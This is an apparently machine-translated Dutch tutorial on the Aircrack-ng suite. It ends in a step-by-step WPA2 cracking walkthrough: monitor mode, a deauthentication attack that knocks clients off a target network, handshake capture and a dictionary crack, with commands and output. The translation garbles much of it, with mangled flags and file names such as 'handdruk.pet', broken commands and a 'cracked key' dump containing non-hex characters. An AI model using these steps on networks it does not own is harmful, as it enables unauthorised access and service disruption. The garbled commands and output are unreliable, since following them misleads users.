luchtkraak

Hoe Aircrack-ng . te gebruiken

Hoe Aircrack-ng . te gebruiken
Meestal denken mensen nooit na over het netwerk waarmee ze zijn verbonden. Ze denken er nooit aan hoe veilig dat netwerk is en hoeveel ze hun vertrouwelijke gegevens dagelijks riskeren. U kunt kwetsbaarheidscontroles uitvoeren op uw wifi-netwerken met behulp van een zeer krachtige tool genaamd Aircrack-ng en Wireshark. Wireshark wordt gebruikt om netwerkactiviteit te controleren. Aircrack-ng is meer een agressieve tool waarmee je kunt hacken en toegang kunt geven tot draadloze verbindingen. Denken als een indringer is altijd de veiligste manier geweest om jezelf te beschermen tegen een hack. U kunt mogelijk de exacte acties begrijpen die een indringer zal nemen om toegang te krijgen tot uw systeem door meer te weten te komen over aircrack. U kunt dan nalevingscontroles uitvoeren op uw eigen systeem om ervoor te zorgen dat het niet onveilig is.

Aircrack-ng is een volledige set software die is ontworpen om wifi-netwerkbeveiliging te testen. Het is niet zomaar een enkele tool, maar een verzameling tools, die elk een bepaald doel dienen. Er kan aan verschillende gebieden van wifi-beveiliging worden gewerkt, zoals het bewaken van het toegangspunt, testen, het netwerk aanvallen, het wifi-netwerk kraken en het testen. Het belangrijkste doel van Aircrack is om de pakketten te onderscheppen en de hashes te ontcijferen om de wachtwoorden te kraken. Het ondersteunt bijna alle nieuwe draadloze interfaces. Aircrack-ng is een verbeterde versie van een verouderde toolsuite Aircrack, ng verwijst naar de Nieuwe generatie. Enkele van de geweldige tools die samenwerken om een ​​grotere taak uit te voeren.

Airmon-ng:

Airmon-ng is inbegrepen in de aircrack-ng-kit die de netwerkinterfacekaart in de monitormodus plaatst. Netwerkkaarten accepteren meestal alleen pakketten die voor hen zijn bedoeld, zoals gedefinieerd door het MAC-adres van de NIC, maar met airmon-ng worden alle draadloze pakketten, of ze nu voor hen zijn bedoeld of niet, ook geaccepteerd. Je zou deze pakketten moeten kunnen opvangen zonder te linken of te authenticeren met het toegangspunt. Het wordt gebruikt om de status van een toegangspunt te controleren door de netwerkinterface in de monitormodus te zetten. Eerst moet je de draadloze kaarten configureren om de monitormodus in te schakelen en vervolgens alle achtergrondprocessen doden als je denkt dat een proces het verstoort. Nadat de processen zijn beëindigd, kan de monitormodus worden ingeschakeld op de draadloze interface door de onderstaande opdracht uit te voeren:

[email protected]:~$ sudo airmon-ng start wlan0 #

U kunt de monitormodus ook uitschakelen door de airmon-ng op elk gewenst moment te stoppen met behulp van de onderstaande opdracht:

[email protected]:~$ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng wordt gebruikt om een ​​lijst te maken van alle netwerken die ons omringen en om waardevolle informatie over hen te bekijken. De basisfunctionaliteit van airodump-ng is om pakketten te snuiven, dus het is in wezen geprogrammeerd om alle pakketten om ons heen te pakken terwijl het in de monitormodus wordt gezet. We zullen het uitvoeren tegen alle verbindingen om ons heen en gegevens verzamelen zoals het aantal clients dat op het netwerk is aangesloten, hun bijbehorende mac-adressen, coderingsstijl en kanaalnamen en beginnen ons vervolgens te richten op ons doelnetwerk.

Door de opdracht airodump-ng te typen en deze de naam van de netwerkinterface als parameter te geven, kunnen we deze tool activeren. Het toont alle toegangspunten, het aantal datapakketten, de gebruikte coderings- en authenticatiemethoden en de naam van het netwerk (ESSID). Vanuit het oogpunt van hacking zijn de mac-adressen de belangrijkste velden.

[email protected]:~$ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack wordt gebruikt voor het kraken van wachtwoorden. Na het vastleggen van alle pakketten met behulp van airodump, kunnen we de sleutel kraken door een luchtkraak. Het kraakt deze sleutels met behulp van twee methoden PTW en FMS. PTW-aanpak gebeurt in twee fasen. In het begin worden alleen de ARP-pakketten gebruikt, en pas daarna, als de sleutel niet is gekraakt na het zoeken, worden alle andere vastgelegde pakketten gebruikt. Een pluspunt van de PTW-aanpak is dat niet alle pakketten worden gebruikt voor het kraken. In de tweede benadering, i.e., FMS, we gebruiken zowel de statistische modellen als de brute force-algoritmen om de sleutel te kraken. Er kan ook een woordenboekmethode worden gebruikt.

Aireplay-ng:

Airplay-ng introduceert pakketten in een draadloos netwerk om verkeer te creëren of te versnellen. Pakketten van twee verschillende bronnen kunnen worden vastgelegd door aireplay-ng. De eerste is het live-netwerk en de tweede is de pakketten van het reeds bestaande pcap-bestand. Airplay-ng is handig tijdens een deauthenticatie-aanval die gericht is op een draadloos toegangspunt en een gebruiker. Bovendien kun je sommige aanvallen uitvoeren, zoals een koffie latte-aanval met airplay-ng, een tool waarmee je een sleutel van het systeem van de klant kunt krijgen.  U kunt dit bereiken door een ARP-pakket te vangen en het vervolgens te manipuleren en terug te sturen naar het systeem. De client maakt dan een pakket dat kan worden opgevangen door airodump en aircrack kraakt de sleutel van dat gewijzigde pakket. Enkele andere aanvalsopties van airplay-ng zijn chopchop, fragment arepreplay, enz.

Vliegbasis-ng:

Airbase-ng wordt gebruikt om de computer van een indringer om te vormen tot een gecompromitteerd verbindingspunt waar anderen verbinding mee kunnen maken. Met Airbase-ng kunt u beweren een legaal toegangspunt te zijn en man-in-the-middle-aanvallen uit te voeren op computers die op uw netwerk zijn aangesloten. Dit soort aanvallen worden Evil Twin Attacks genoemd. Het is voor basisgebruikers onmogelijk om onderscheid te maken tussen een legaal toegangspunt en een nep toegangspunt. De kwaadaardige tweelingdreiging is dus een van de meest bedreigende draadloze bedreigingen waarmee we vandaag worden geconfronteerd.

Airolib-ng:

Airolib versnelt het hackproces door de wachtwoordlijsten en het toegangspunt op te slaan en te beheren. Het databasebeheersysteem dat door dit programma wordt gebruikt, is SQLite3, dat meestal beschikbaar is op alle platforms. Het kraken van wachtwoorden omvat de berekening van de paarsgewijze hoofdsleutel waarmee de persoonlijke tijdelijke sleutel (PTK) wordt geëxtraheerd. Met behulp van de PTK kunt u de frame-berichtidentificatiecode (MIC) voor een bepaald pakket bepalen en theoretisch vinden dat de MIC vergelijkbaar is met het pakket, dus als de PTK gelijk had, had de PMK ook gelijk.

Typ de volgende opdracht om de wachtwoordlijsten en toegangsnetwerken te zien die zijn opgeslagen in de database:

[email protected]:~$ sudo airlib-ng testdatabase -stats

Hier is testdatabase de db die u wilt openen of maken, en -stats is de bewerking die u erop wilt uitvoeren. U kunt meerdere bewerkingen uitvoeren op de databasevelden, zoals het geven van maximale prioriteit aan een SSID of zoiets. Voer de volgende opdracht in om airlib-ng met aircrack-ng te gebruiken:

[email protected]:~$ sudo aircrack-ng  -r testdatabase wpa2.eapol.pet

Hier gebruiken we de reeds berekende PMK's die zijn opgeslagen in de testdatabase om het kraken van wachtwoorden te versnellen.

WPA/WPA2 kraken met Aircrack-ng:

Laten we eens kijken naar een klein voorbeeld van wat aircrack-ng kan doen met behulp van een paar van zijn geweldige tools.  We zullen de vooraf gedeelde sleutel van een WPA/WPA2-netwerk kraken met behulp van een woordenboekmethode.

Het eerste dat we moeten doen, is een lijst maken van netwerkinterfaces die de monitormodus ondersteunen. Dit kan met het volgende commando:

[e-mail beveiligd]:~$ sudo airmon-ng
PHY    Interface                  Stuurprogramma         Chipset
Phy0   wlx0                       rtl8xxxu       Realtek Semiconductor Corp.

We kunnen een interface zien; nu moeten we de netwerkinterface die we hebben gevonden ( wlx0 ) in de monitormodus zetten met behulp van de volgende opdracht:

[email protected]:~$ sudo airmon-ng start wlx0

Het heeft de monitormodus ingeschakeld op de interface genaamd wlx0mon.

Nu zouden we moeten gaan luisteren naar uitzendingen van nabijgelegen routers via onze netwerkinterface die we in de monitormodus hebben gezet.

[email protected]:~$ sudo airodump-ng wlx0mon
CH  5 ][ Verstreken: 30 s ][ 2020-12-02 00:17
 
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
E4:6F:13:04:CE:31  -45       62       27    0   1  54e  WPA2 CCMP   PSK  CrackIt
C4:E9:84:76:10:BE  -63       77        0    0   6  54e. WPA2 CCMP   PSK  HAckme
C8:3A:35:A0:4E:01  -63       84        0    0   8  54e  WPA2 CCMP   PSK  Net07
74:DA:88:FA:38:02  -68       28        2    0  11  54e  WPA2 CCMP   PSK  TP-Link_3802
 
BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 
E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B   -3    0 - 1e     8        5
E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -33    1e- 6e     0        3
E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -35    0 - 1      0        6
E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -39    0e- 1   1002       13 

Ons doelnetwerk is: Breek het in dit geval, die momenteel draait op kanaal 1.

Om hier het wachtwoord van het doelnetwerk te kraken, moeten we een 4-way handshake vastleggen, wat gebeurt wanneer een apparaat verbinding probeert te maken met een netwerk. We kunnen het vastleggen met behulp van de volgende opdracht:

[email protected]:~$ sudo airodump-ng -c 1 --bssid  E4:6F:13:04:CE:31 -w /home wlx0

-c         : Kanaal

-bssid: Bssid van het doelnetwerk

-met wie        : De naam van de map waar het pcap-bestand zal worden geplaatst

Nu moeten we wachten tot een apparaat verbinding maakt met het netwerk, maar er is een betere manier om een ​​handdruk vast te leggen. We kunnen de apparaten de-authenticeren naar de AP met behulp van een de-authenticatie-aanval met behulp van de volgende opdracht:

[email protected]:~$ sudo aireplay-ng -0 -a E4:6F:13:04:CE:31

een:    Bssid van het doelnetwerk

-0:   deauthenticatie-aanval

We hebben alle apparaten losgekoppeld en nu moeten we wachten tot een apparaat verbinding maakt met het netwerk.

CH  1 ][ Verstreken: 30 s ][ 2020-12-02 00:02 ][ WPA-handshake: E4:6F:13:04:CE:31
 
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
 
E4:6F:13:04:CE:31  -47   1      228      807   36   1  54e  WPA2 CCMP   PSK  P
 
BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 
E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -35    0 - 1      0        1
E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B  -29    0e- 1e     0       22
E4:6F:13:04:CE:31  88:28:B3:30:27:7E  -31    0e- 1      0       32
E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -35    0e- 6e   263      708  CrackIt
E4:6F:13:04:CE:31  D4:6A:6A:99:ED:E3  -35    0e- 0e     0       86
E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -37    0 - 1e     0        1            

We hebben een treffer, en door naar de rechterbovenhoek te kijken, direct naast de tijd, kunnen we zien dat er een handdruk is vastgelegd. Kijk nu in de opgegeven map ( /huis in ons geval ) voor een “.pcap" het dossier.

Om de WPA-sleutel te kraken, kunnen we de volgende opdracht gebruiken:

[email protected]:~$ sudo aircrack-ng -a2 -w rockyou.txt -b  E4:6F:13:04:CE:31 handdruk.pet
b                          :Bssid van het doelnetwerk
-a2                      :WPA2-modus
Rockyou.txt:       Het gebruikte woordenboekbestand
Handdruk.cap: Het bestand dat de vastgelegde handdruk bevat
Aircrack-ng 1.2 bèta3
[00:01:49] 10566 sleutels getest (1017.96 k/s)
SLEUTEL GEVONDEN! [ je hebt me ]
Hoofdsleutel:   8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Voorbijgaande sleutel: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

De sleutel tot ons doelnetwerk is met succes gekraakt.

Conclusie:

Draadloze netwerken zijn overal en worden door elk bedrijf gebruikt, van werknemers die smartphones gebruiken tot industriële besturingsapparaten. Volgens onderzoek zal in 2021 bijna 50 procent van het internetverkeer via wifi verlopen.  Draadloze netwerken hebben veel voordelen, communicatie buiten de deur, snelle internettoegang op plaatsen waar het bijna onmogelijk is om draden te leggen, kunnen het netwerk uitbreiden zonder kabels te hoeven leggen voor een andere gebruiker, en kunnen uw mobiele apparaten gemakkelijk verbinden met uw thuiskantoren terwijl u aan het werk bent. is er niet.

Ondanks deze voordelen is er een groot vraagteken over uw privacy en veiligheid. Zoals deze netwerken; binnen het zendbereik van routers zijn voor iedereen toegankelijk, ze kunnen gemakkelijk worden aangevallen en uw gegevens kunnen gemakkelijk worden aangetast. Als u bijvoorbeeld bent verbonden met een openbare wifi, kan iedereen die op dat netwerk is aangesloten eenvoudig uw netwerkverkeer controleren met behulp van wat intelligentie en met behulp van geweldige beschikbare tools en het zelfs dumpen.

Open source-poorten van commerciële game-engines
Gratis, open source en platformonafhankelijke game-engine-recreaties kunnen worden gebruikt om zowel oude als enkele van de vrij recente gametitels te...
Beste opdrachtregelspellen voor Linux
De opdrachtregel is niet alleen je grootste bondgenoot bij het gebruik van Linux, hij kan ook de bron van entertainment zijn omdat je hem kunt gebruik...
Beste gamepad-toewijzingsapps voor Linux
Als je graag games op Linux speelt met een gamepad in plaats van een typisch toetsenbord- en muisinvoersysteem, zijn er enkele handige apps voor jou. ...